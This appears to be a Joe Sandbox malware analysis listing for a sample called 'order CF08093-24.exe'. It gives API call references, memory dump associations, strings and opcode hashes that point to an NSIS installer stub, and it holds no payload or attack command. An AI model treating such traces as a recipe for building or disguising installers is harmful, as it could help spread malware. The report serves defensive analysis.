• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
• Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
• Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
• Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
• GlobalFree.KERNEL32(?), ref: 00402A2B
• GlobalFree.KERNEL32(00000000), ref: 00402A3E
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
• Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
• Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
• Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
• Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
• Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
• Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
• Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
APIs
• GetDlgItem.USER32(?,?), ref: 00401DBF
• GetClientRect.USER32(?,?), ref: 00401E0A
• LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
• SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
• DeleteObject.GDI32(00000000), ref: 00401E5E
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
• Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
• Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
• Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                            • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                            • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                            • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                            • wsprintfW.USER32 ref: 00404E17
                                                                            • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                            • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                                            • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                            • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-823278215
                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                                            • GetTickCount.KERNEL32 ref: 0040306F
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                            • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                                            • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                            • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                                            APIs
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405EC9
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                            • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405F71
                                                                            • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-823278215
                                                                            • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                            • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                                            • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                            • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405569
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                                              • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                            • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                                            • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                            • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: : Completed
                                                                            • API String ID: 3356406503-2954849223
                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-823278215
                                                                            • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                            • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                                            • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                            • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                                            APIs
